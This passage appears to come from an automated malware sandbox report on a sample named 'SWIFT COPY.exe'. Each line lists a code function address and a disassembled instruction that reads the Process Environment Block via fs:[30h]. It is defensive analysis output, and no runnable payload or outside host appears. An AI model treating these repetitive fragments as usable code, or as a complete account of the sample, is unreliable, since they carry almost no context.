                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013D437C mov eax, dword ptr fs:[00000030h]3_2_013D437C
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01408324 mov eax, dword ptr fs:[00000030h]3_2_01408324
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01408324 mov ecx, dword ptr fs:[00000030h]3_2_01408324
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01408324 mov eax, dword ptr fs:[00000030h]3_2_01408324
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01408324 mov eax, dword ptr fs:[00000030h]3_2_01408324
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B035C mov eax, dword ptr fs:[00000030h]3_2_013B035C
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B035C mov eax, dword ptr fs:[00000030h]3_2_013B035C
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B035C mov eax, dword ptr fs:[00000030h]3_2_013B035C
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B035C mov ecx, dword ptr fs:[00000030h]3_2_013B035C
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B035C mov eax, dword ptr fs:[00000030h]3_2_013B035C
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B035C mov eax, dword ptr fs:[00000030h]3_2_013B035C
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013FA352 mov eax, dword ptr fs:[00000030h]3_2_013FA352
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013D8350 mov ecx, dword ptr fs:[00000030h]3_2_013D8350
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B2349 mov eax, dword ptr fs:[00000030h]3_2_013B2349
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B2349 mov eax, dword ptr fs:[00000030h]3_2_013B2349
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B2349 mov eax, dword ptr fs:[00000030h]3_2_013B2349
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B2349 mov eax, dword ptr fs:[00000030h]3_2_013B2349
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B2349 mov eax, dword ptr fs:[00000030h]3_2_013B2349
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B2349 mov eax, dword ptr fs:[00000030h]3_2_013B2349
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B2349 mov eax, dword ptr fs:[00000030h]3_2_013B2349
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B2349 mov eax, dword ptr fs:[00000030h]3_2_013B2349
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B2349 mov eax, dword ptr fs:[00000030h]3_2_013B2349
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B2349 mov eax, dword ptr fs:[00000030h]3_2_013B2349
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B2349 mov eax, dword ptr fs:[00000030h]3_2_013B2349
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B2349 mov eax, dword ptr fs:[00000030h]3_2_013B2349
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B2349 mov eax, dword ptr fs:[00000030h]3_2_013B2349
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B2349 mov eax, dword ptr fs:[00000030h]3_2_013B2349
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B2349 mov eax, dword ptr fs:[00000030h]3_2_013B2349
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01328397 mov eax, dword ptr fs:[00000030h]3_2_01328397
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01328397 mov eax, dword ptr fs:[00000030h]3_2_01328397
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01328397 mov eax, dword ptr fs:[00000030h]3_2_01328397
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0132E388 mov eax, dword ptr fs:[00000030h]3_2_0132E388
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0132E388 mov eax, dword ptr fs:[00000030h]3_2_0132E388
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0132E388 mov eax, dword ptr fs:[00000030h]3_2_0132E388
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0135438F mov eax, dword ptr fs:[00000030h]3_2_0135438F
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0135438F mov eax, dword ptr fs:[00000030h]3_2_0135438F
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0134E3F0 mov eax, dword ptr fs:[00000030h]3_2_0134E3F0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0134E3F0 mov eax, dword ptr fs:[00000030h]3_2_0134E3F0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0134E3F0 mov eax, dword ptr fs:[00000030h]3_2_0134E3F0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013663FF mov eax, dword ptr fs:[00000030h]3_2_013663FF
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013403E9 mov eax, dword ptr fs:[00000030h]3_2_013403E9
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013403E9 mov eax, dword ptr fs:[00000030h]3_2_013403E9
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013403E9 mov eax, dword ptr fs:[00000030h]3_2_013403E9
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013403E9 mov eax, dword ptr fs:[00000030h]3_2_013403E9
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013403E9 mov eax, dword ptr fs:[00000030h]3_2_013403E9
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013403E9 mov eax, dword ptr fs:[00000030h]3_2_013403E9
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013403E9 mov eax, dword ptr fs:[00000030h]3_2_013403E9
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013403E9 mov eax, dword ptr fs:[00000030h]3_2_013403E9
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013DE3DB mov eax, dword ptr fs:[00000030h]3_2_013DE3DB
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013DE3DB mov eax, dword ptr fs:[00000030h]3_2_013DE3DB
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013DE3DB mov ecx, dword ptr fs:[00000030h]3_2_013DE3DB
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013DE3DB mov eax, dword ptr fs:[00000030h]3_2_013DE3DB
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013D43D4 mov eax, dword ptr fs:[00000030h]3_2_013D43D4
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013D43D4 mov eax, dword ptr fs:[00000030h]3_2_013D43D4
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013EC3CD mov eax, dword ptr fs:[00000030h]3_2_013EC3CD
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0133A3C0 mov eax, dword ptr fs:[00000030h]3_2_0133A3C0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0133A3C0 mov eax, dword ptr fs:[00000030h]3_2_0133A3C0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0133A3C0 mov eax, dword ptr fs:[00000030h]3_2_0133A3C0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0133A3C0 mov eax, dword ptr fs:[00000030h]3_2_0133A3C0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0133A3C0 mov eax, dword ptr fs:[00000030h]3_2_0133A3C0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0133A3C0 mov eax, dword ptr fs:[00000030h]3_2_0133A3C0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013383C0 mov eax, dword ptr fs:[00000030h]3_2_013383C0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013383C0 mov eax, dword ptr fs:[00000030h]3_2_013383C0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013383C0 mov eax, dword ptr fs:[00000030h]3_2_013383C0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013383C0 mov eax, dword ptr fs:[00000030h]3_2_013383C0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B63C0 mov eax, dword ptr fs:[00000030h]3_2_013B63C0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0132823B mov eax, dword ptr fs:[00000030h]3_2_0132823B
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0140625D mov eax, dword ptr fs:[00000030h]3_2_0140625D
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013E0274 mov eax, dword ptr fs:[00000030h]3_2_013E0274
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013E0274 mov eax, dword ptr fs:[00000030h]3_2_013E0274
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013E0274 mov eax, dword ptr fs:[00000030h]3_2_013E0274
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013E0274 mov eax, dword ptr fs:[00000030h]3_2_013E0274
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013E0274 mov eax, dword ptr fs:[00000030h]3_2_013E0274
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013E0274 mov eax, dword ptr fs:[00000030h]3_2_013E0274
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013E0274 mov eax, dword ptr fs:[00000030h]3_2_013E0274
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013E0274 mov eax, dword ptr fs:[00000030h]3_2_013E0274
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013E0274 mov eax, dword ptr fs:[00000030h]3_2_013E0274
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013E0274 mov eax, dword ptr fs:[00000030h]3_2_013E0274
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013E0274 mov eax, dword ptr fs:[00000030h]3_2_013E0274
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013E0274 mov eax, dword ptr fs:[00000030h]3_2_013E0274
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01334260 mov eax, dword ptr fs:[00000030h]3_2_01334260
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01334260 mov eax, dword ptr fs:[00000030h]3_2_01334260
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01334260 mov eax, dword ptr fs:[00000030h]3_2_01334260
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0132826B mov eax, dword ptr fs:[00000030h]3_2_0132826B
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0132A250 mov eax, dword ptr fs:[00000030h]3_2_0132A250
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01336259 mov eax, dword ptr fs:[00000030h]3_2_01336259
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013EA250 mov eax, dword ptr fs:[00000030h]3_2_013EA250
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013EA250 mov eax, dword ptr fs:[00000030h]3_2_013EA250
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B8243 mov eax, dword ptr fs:[00000030h]3_2_013B8243
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B8243 mov ecx, dword ptr fs:[00000030h]3_2_013B8243
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013402A0 mov eax, dword ptr fs:[00000030h]3_2_013402A0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013402A0 mov eax, dword ptr fs:[00000030h]3_2_013402A0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_014062D6 mov eax, dword ptr fs:[00000030h]3_2_014062D6
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013C62A0 mov eax, dword ptr fs:[00000030h]3_2_013C62A0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013C62A0 mov ecx, dword ptr fs:[00000030h]3_2_013C62A0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013C62A0 mov eax, dword ptr fs:[00000030h]3_2_013C62A0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013C62A0 mov eax, dword ptr fs:[00000030h]3_2_013C62A0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013C62A0 mov eax, dword ptr fs:[00000030h]3_2_013C62A0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013C62A0 mov eax, dword ptr fs:[00000030h]3_2_013C62A0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136E284 mov eax, dword ptr fs:[00000030h]3_2_0136E284
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136E284 mov eax, dword ptr fs:[00000030h]3_2_0136E284
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B0283 mov eax, dword ptr fs:[00000030h]3_2_013B0283
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B0283 mov eax, dword ptr fs:[00000030h]3_2_013B0283
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B0283 mov eax, dword ptr fs:[00000030h]3_2_013B0283
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013402E1 mov eax, dword ptr fs:[00000030h]3_2_013402E1
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013402E1 mov eax, dword ptr fs:[00000030h]3_2_013402E1
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013402E1 mov eax, dword ptr fs:[00000030h]3_2_013402E1
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0133A2C3 mov eax, dword ptr fs:[00000030h]3_2_0133A2C3
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0133A2C3 mov eax, dword ptr fs:[00000030h]3_2_0133A2C3
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0133A2C3 mov eax, dword ptr fs:[00000030h]3_2_0133A2C3
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0133A2C3 mov eax, dword ptr fs:[00000030h]3_2_0133A2C3
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0133A2C3 mov eax, dword ptr fs:[00000030h]3_2_0133A2C3
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01340535 mov eax, dword ptr fs:[00000030h]3_2_01340535
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01340535 mov eax, dword ptr fs:[00000030h]3_2_01340535
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01340535 mov eax, dword ptr fs:[00000030h]3_2_01340535
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01340535 mov eax, dword ptr fs:[00000030h]3_2_01340535
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01340535 mov eax, dword ptr fs:[00000030h]3_2_01340535
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01340535 mov eax, dword ptr fs:[00000030h]3_2_01340535
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0135E53E mov eax, dword ptr fs:[00000030h]3_2_0135E53E
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0135E53E mov eax, dword ptr fs:[00000030h]3_2_0135E53E
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0135E53E mov eax, dword ptr fs:[00000030h]3_2_0135E53E
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0135E53E mov eax, dword ptr fs:[00000030h]3_2_0135E53E
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0135E53E mov eax, dword ptr fs:[00000030h]3_2_0135E53E
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013C6500 mov eax, dword ptr fs:[00000030h]3_2_013C6500
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01404500 mov eax, dword ptr fs:[00000030h]3_2_01404500
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01404500 mov eax, dword ptr fs:[00000030h]3_2_01404500
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01404500 mov eax, dword ptr fs:[00000030h]3_2_01404500
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01404500 mov eax, dword ptr fs:[00000030h]3_2_01404500
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01404500 mov eax, dword ptr fs:[00000030h]3_2_01404500
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01404500 mov eax, dword ptr fs:[00000030h]3_2_01404500
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01404500 mov eax, dword ptr fs:[00000030h]3_2_01404500
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136656A mov eax, dword ptr fs:[00000030h]3_2_0136656A
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136656A mov eax, dword ptr fs:[00000030h]3_2_0136656A
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136656A mov eax, dword ptr fs:[00000030h]3_2_0136656A
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01338550 mov eax, dword ptr fs:[00000030h]3_2_01338550
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01338550 mov eax, dword ptr fs:[00000030h]3_2_01338550
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013545B1 mov eax, dword ptr fs:[00000030h]3_2_013545B1
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013545B1 mov eax, dword ptr fs:[00000030h]3_2_013545B1
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B05A7 mov eax, dword ptr fs:[00000030h]3_2_013B05A7
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B05A7 mov eax, dword ptr fs:[00000030h]3_2_013B05A7
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B05A7 mov eax, dword ptr fs:[00000030h]3_2_013B05A7
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136E59C mov eax, dword ptr fs:[00000030h]3_2_0136E59C
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01332582 mov eax, dword ptr fs:[00000030h]3_2_01332582
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01332582 mov ecx, dword ptr fs:[00000030h]3_2_01332582
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01364588 mov eax, dword ptr fs:[00000030h]3_2_01364588
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0135E5E7 mov eax, dword ptr fs:[00000030h]3_2_0135E5E7
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0135E5E7 mov eax, dword ptr fs:[00000030h]3_2_0135E5E7
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0135E5E7 mov eax, dword ptr fs:[00000030h]3_2_0135E5E7
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0135E5E7 mov eax, dword ptr fs:[00000030h]3_2_0135E5E7
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0135E5E7 mov eax, dword ptr fs:[00000030h]3_2_0135E5E7
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0135E5E7 mov eax, dword ptr fs:[00000030h]3_2_0135E5E7
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0135E5E7 mov eax, dword ptr fs:[00000030h]3_2_0135E5E7
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0135E5E7 mov eax, dword ptr fs:[00000030h]3_2_0135E5E7
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013325E0 mov eax, dword ptr fs:[00000030h]3_2_013325E0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136C5ED mov eax, dword ptr fs:[00000030h]3_2_0136C5ED
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136C5ED mov eax, dword ptr fs:[00000030h]3_2_0136C5ED
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013365D0 mov eax, dword ptr fs:[00000030h]3_2_013365D0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136A5D0 mov eax, dword ptr fs:[00000030h]3_2_0136A5D0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136A5D0 mov eax, dword ptr fs:[00000030h]3_2_0136A5D0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136E5CF mov eax, dword ptr fs:[00000030h]3_2_0136E5CF
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136E5CF mov eax, dword ptr fs:[00000030h]3_2_0136E5CF
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0132E420 mov eax, dword ptr fs:[00000030h]3_2_0132E420
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0132E420 mov eax, dword ptr fs:[00000030h]3_2_0132E420
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0132E420 mov eax, dword ptr fs:[00000030h]3_2_0132E420
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0132C427 mov eax, dword ptr fs:[00000030h]3_2_0132C427
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B6420 mov eax, dword ptr fs:[00000030h]3_2_013B6420
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B6420 mov eax, dword ptr fs:[00000030h]3_2_013B6420
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B6420 mov eax, dword ptr fs:[00000030h]3_2_013B6420
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B6420 mov eax, dword ptr fs:[00000030h]3_2_013B6420
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B6420 mov eax, dword ptr fs:[00000030h]3_2_013B6420
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B6420 mov eax, dword ptr fs:[00000030h]3_2_013B6420
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B6420 mov eax, dword ptr fs:[00000030h]3_2_013B6420
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01368402 mov eax, dword ptr fs:[00000030h]3_2_01368402
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01368402 mov eax, dword ptr fs:[00000030h]3_2_01368402
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01368402 mov eax, dword ptr fs:[00000030h]3_2_01368402
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0135A470 mov eax, dword ptr fs:[00000030h]3_2_0135A470
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0135A470 mov eax, dword ptr fs:[00000030h]3_2_0135A470
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0135A470 mov eax, dword ptr fs:[00000030h]3_2_0135A470
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013BC460 mov ecx, dword ptr fs:[00000030h]3_2_013BC460
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013EA456 mov eax, dword ptr fs:[00000030h]3_2_013EA456
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0132645D mov eax, dword ptr fs:[00000030h]3_2_0132645D
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0135245A mov eax, dword ptr fs:[00000030h]3_2_0135245A
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136E443 mov eax, dword ptr fs:[00000030h]3_2_0136E443
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136E443 mov eax, dword ptr fs:[00000030h]3_2_0136E443
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136E443 mov eax, dword ptr fs:[00000030h]3_2_0136E443
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136E443 mov eax, dword ptr fs:[00000030h]3_2_0136E443
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136E443 mov eax, dword ptr fs:[00000030h]3_2_0136E443
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136E443 mov eax, dword ptr fs:[00000030h]3_2_0136E443
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136E443 mov eax, dword ptr fs:[00000030h]3_2_0136E443
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136E443 mov eax, dword ptr fs:[00000030h]3_2_0136E443
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013644B0 mov ecx, dword ptr fs:[00000030h]3_2_013644B0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013BA4B0 mov eax, dword ptr fs:[00000030h]3_2_013BA4B0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013364AB mov eax, dword ptr fs:[00000030h]3_2_013364AB
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013EA49A mov eax, dword ptr fs:[00000030h]3_2_013EA49A
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013304E5 mov ecx, dword ptr fs:[00000030h]3_2_013304E5
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136273C mov eax, dword ptr fs:[00000030h]3_2_0136273C
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136273C mov ecx, dword ptr fs:[00000030h]3_2_0136273C
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136273C mov eax, dword ptr fs:[00000030h]3_2_0136273C
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013AC730 mov eax, dword ptr fs:[00000030h]3_2_013AC730
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136C720 mov eax, dword ptr fs:[00000030h]3_2_0136C720
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136C720 mov eax, dword ptr fs:[00000030h]3_2_0136C720
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01330710 mov eax, dword ptr fs:[00000030h]3_2_01330710
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01360710 mov eax, dword ptr fs:[00000030h]3_2_01360710
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136C700 mov eax, dword ptr fs:[00000030h]3_2_0136C700
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01338770 mov eax, dword ptr fs:[00000030h]3_2_01338770
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01340770 mov eax, dword ptr fs:[00000030h]3_2_01340770
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01340770 mov eax, dword ptr fs:[00000030h]3_2_01340770
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01340770 mov eax, dword ptr fs:[00000030h]3_2_01340770
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01340770 mov eax, dword ptr fs:[00000030h]3_2_01340770
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01340770 mov eax, dword ptr fs:[00000030h]3_2_01340770
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01340770 mov eax, dword ptr fs:[00000030h]3_2_01340770
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01340770 mov eax, dword ptr fs:[00000030h]3_2_01340770
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01340770 mov eax, dword ptr fs:[00000030h]3_2_01340770
